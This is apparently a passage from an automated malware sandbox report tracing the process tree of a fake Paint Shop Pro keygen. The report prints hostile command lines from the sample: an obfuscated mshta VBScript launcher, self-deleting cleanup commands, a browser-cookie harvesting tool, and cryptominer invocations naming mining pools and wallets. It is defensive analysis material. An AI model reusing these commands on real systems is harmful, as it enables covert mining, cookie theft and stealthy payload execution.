Token: SeSystemtimePrivilege 2420 svchost.exe Token: SeBackupPrivilege 2420 svchost.exe Token: SeRestorePrivilege 2420 svchost.exe Token: SeShutdownPrivilege 2420 svchost.exe Token: SeSystemEnvironmentPrivilege 2420 svchost.exe Token: SeUndockPrivilege 2420 svchost.exe Token: SeManageVolumePrivilege 2420 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2420 svchost.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
iexplore.exeultramediaburner.tmpirecord.tmppid process 3944 iexplore.exe 3944 iexplore.exe 4888 ultramediaburner.tmp 6016 irecord.tmp -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
iexplore.exeIEXPLORE.EXEFree.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 3944 iexplore.exe 3944 iexplore.exe 4000 IEXPLORE.EXE 4000 IEXPLORE.EXE 4000 IEXPLORE.EXE 4000 IEXPLORE.EXE 1796 Free.exe 1796 Free.exe 4384 MicrosoftEdge.exe 4580 MicrosoftEdgeCP.exe 4580 MicrosoftEdgeCP.exe 5392 MicrosoftEdge.exe 3192 MicrosoftEdgeCP.exe 3192 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
iexplore.exeJasc_Paint_Shop_Pro_9_0_crack_by_TSRh.execmd.exekeygen-pr.exekeygen-step-5.exemshta.exekey.exekeygen-step-4.execmd.exeFree.exerundll32.exesvchost.exedescription pid process target process PID 3944 wrote to memory of 4000 3944 iexplore.exe IEXPLORE.EXE PID 3944 wrote to memory of 4000 3944 iexplore.exe IEXPLORE.EXE PID 3944 wrote to memory of 4000 3944 iexplore.exe IEXPLORE.EXE PID 1392 wrote to memory of 2664 1392 Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe cmd.exe PID 1392 wrote to memory of 2664 1392 Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe cmd.exe PID 1392 wrote to memory of 2664 1392 Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe cmd.exe PID 2664 wrote to memory of 700 2664 cmd.exe keygen-pr.exe PID 2664 wrote to memory of 700 2664 cmd.exe keygen-pr.exe PID 2664 wrote to memory of 700 2664 cmd.exe keygen-pr.exe PID 2664 wrote to memory of 3584 2664 cmd.exe keygen-step-1.exe PID 2664 wrote to memory of 3584 2664 cmd.exe keygen-step-1.exe PID 2664 wrote to memory of 3584 2664 cmd.exe keygen-step-1.exe PID 2664 wrote to memory of 3480 2664 cmd.exe keygen-step-5.exe PID 2664 wrote to memory of 3480 2664 cmd.exe keygen-step-5.exe PID 2664 wrote to memory of 3480 2664 cmd.exe keygen-step-5.exe PID 2664 wrote to memory of 4020 2664 cmd.exe keygen-step-2.exe PID 2664 wrote to memory of 4020 2664 cmd.exe keygen-step-2.exe PID 2664 wrote to memory of 4020 2664 cmd.exe keygen-step-2.exe PID 2664 wrote to memory of 2820 2664 cmd.exe keygen-step-3.exe PID 2664 wrote to memory of 2820 2664 cmd.exe keygen-step-3.exe PID 2664 wrote to memory of 2820 2664 cmd.exe keygen-step-3.exe PID 700 wrote to memory of 2064 700 keygen-pr.exe key.exe PID 700 wrote to memory of 2064 700 keygen-pr.exe key.exe PID 700 wrote to memory of 2064 700 keygen-pr.exe key.exe PID 3480 wrote to memory of 1784 3480 keygen-step-5.exe mshta.exe PID 3480 wrote to memory of 1784 3480 keygen-step-5.exe mshta.exe PID 3480 wrote to memory of 1784 3480 keygen-step-5.exe mshta.exe PID 2664 wrote to memory of 3528 2664 cmd.exe keygen-step-4.exe PID 2664 wrote to memory of 3528 2664 cmd.exe keygen-step-4.exe PID 2664 wrote to memory of 3528 2664 cmd.exe keygen-step-4.exe PID 1784 wrote to memory of 1968 1784 mshta.exe cmd.exe PID 1784 wrote to memory of 1968 1784 mshta.exe cmd.exe PID 1784 wrote to memory of 1968 1784 mshta.exe cmd.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 2064 wrote to memory of 2248 2064 key.exe key.exe PID 3528 wrote to memory of 1796 3528 keygen-step-4.exe Free.exe PID 3528 wrote to memory of 1796 3528 keygen-step-4.exe Free.exe PID 3528 wrote to memory of 1796 3528 keygen-step-4.exe Free.exe PID 1968 wrote to memory of 1596 1968 cmd.exe NYuI1gZGXFxr8Q.exe PID 1968 wrote to memory of 1596 1968 cmd.exe NYuI1gZGXFxr8Q.exe PID 1968 wrote to memory of 1596 1968 cmd.exe NYuI1gZGXFxr8Q.exe PID 1796 wrote to memory of 2368 1796 Free.exe rundll32.exe PID 1796 wrote to memory of 2368 1796 Free.exe rundll32.exe PID 1796 wrote to memory of 2368 1796 Free.exe rundll32.exe PID 3528 wrote to memory of 3264 3528 keygen-step-4.exe JoSetp.exe PID 3528 wrote to memory of 3264 3528 keygen-step-4.exe JoSetp.exe PID 2368 wrote to memory of 388 2368 rundll32.exe svchost.exe PID 2368 wrote to memory of 2704 2368 rundll32.exe svchost.exe PID 388 wrote to memory of 4196 388 svchost.exe svchost.exe PID 388 wrote to memory of 4196 388 svchost.exe svchost.exe PID 388 wrote to memory of 4196 388 svchost.exe svchost.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://keygenit.com/d/8550ceeb125094q2480.html1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3944 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\fbvhagtC:\Users\Admin\AppData\Roaming\fbvhagt2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fbvhagt"C:\Users\Admin\AppData\Roaming\fbvhagt"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\fbvhagtC:\Users\Admin\AppData\Roaming\fbvhagt2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fbvhagt"C:\Users\Admin\AppData\Roaming\fbvhagt"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\fbvhagtC:\Users\Admin\AppData\Roaming\fbvhagt2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fbvhagt"C:\Users\Admin\AppData\Roaming\fbvhagt"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exekeygen-step-5.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIpT:cLose ( CReatEoBjeCt ( "wscRIpT.SheLL" ). RuN("C:\Windows\system32\cmd.exe /C Type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If """"== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -Im ""%~NXa"" /f > NuL ", 0 ) )4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If ""== "" for %a In ("C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe") do taskkill -Im "%~NXa" /f > NuL5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exeNYuI1gZGXFxr8Q.exe /pfztvgOHczW85186⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIpT:cLose ( CReatEoBjeCt ( "wscRIpT.SheLL" ). RuN("C:\Windows\system32\cmd.exe /C Type ""C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe"" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If ""/pfztvgOHczW8518 ""== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe"" ) do taskkill -Im ""%~NXa"" /f > NuL ", 0 ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If "/pfztvgOHczW8518 "== "" for %a In ("C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe") do taskkill -Im "%~NXa" /f > NuL8⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" .\xUHTZND.6T /U -S7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "keygen-step-5.exe" /f6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\3440.tmp.exe"C:\Users\Admin\AppData\Roaming\3440.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\3440.tmp.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Free.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Free.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\4081858.exe"C:\ProgramData\4081858.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\889190.exe"C:\ProgramData\889190.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-5G58F.tmp\Install.tmp"C:\Users\Admin\AppData\Local\Temp\is-5G58F.tmp\Install.tmp" /SL5="$80392,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-VPPV3.tmp\Ultra.exe"C:\Users\Admin\AppData\Local\Temp\is-VPPV3.tmp\Ultra.exe" /S /UID=burnerch16⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\VideoLAN\MGXZJJAFXW\ultramediaburner.exe"C:\Program Files\VideoLAN\MGXZJJAFXW\ultramediaburner.exe" /VERYSILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-46VP6.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-46VP6.tmp\ultramediaburner.tmp" /SL5="$303D0,281924,62464,C:\Program Files\VideoLAN\MGXZJJAFXW\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\18-19c92-2e6-1d9bc-f6bc7cdb505b5\Xaevavizhyko.exe"C:\Users\Admin\AppData\Local\Temp\18-19c92-2e6-1d9bc-f6bc7cdb505b5\Xaevavizhyko.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\8CEF.tmp.exe"C:\Users\Admin\AppData\Roaming\8CEF.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\8CEF.tmp.exe"C:\Users\Admin\AppData\Roaming\8CEF.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\8F32.tmp.exe"C:\Users\Admin\AppData\Roaming\8F32.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w24983@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w21868 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-DJ6O4.tmp\IrecCH6.tmp"C:\Users\Admin\AppData\Local\Temp\is-DJ6O4.tmp\IrecCH6.tmp" /SL5="$70482,234767,151040,C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-M77IB.tmp\player_record_48792.exe"C:\Users\Admin\AppData\Local\Temp\is-M77IB.tmp\player_record_48792.exe" /S /UID=irecch66⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Uninstall Information\WUGAUHDUPK\irecord.exe"C:\Program Files\Uninstall Information\WUGAUHDUPK\irecord.exe" /VERYSILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-UN8TD.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-UN8TD.tmp\irecord.tmp" /SL5="$404BA,6139911,56832,C:\Program Files\Uninstall Information\WUGAUHDUPK\irecord.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\recording\i-record.exe"C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\c0-ff61e-de2-0ccb1-c681c6cb29121\Sorihahyxe.exe"C:\Users\Admin\AppData\Local\Temp\c0-ff61e-de2-0ccb1-c681c6cb29121\Sorihahyxe.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\73-77e30-964-b87a7-4dc9043f34564\Ropakomivi.exe"C:\Users\Admin\AppData\Local\Temp\73-77e30-964-b87a7-4dc9043f34564\Ropakomivi.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\5938.exeC:\Users\Admin\AppData\Local\Temp\5938.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5BE8.exeC:\Users\Admin\AppData\Local\Temp\5BE8.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
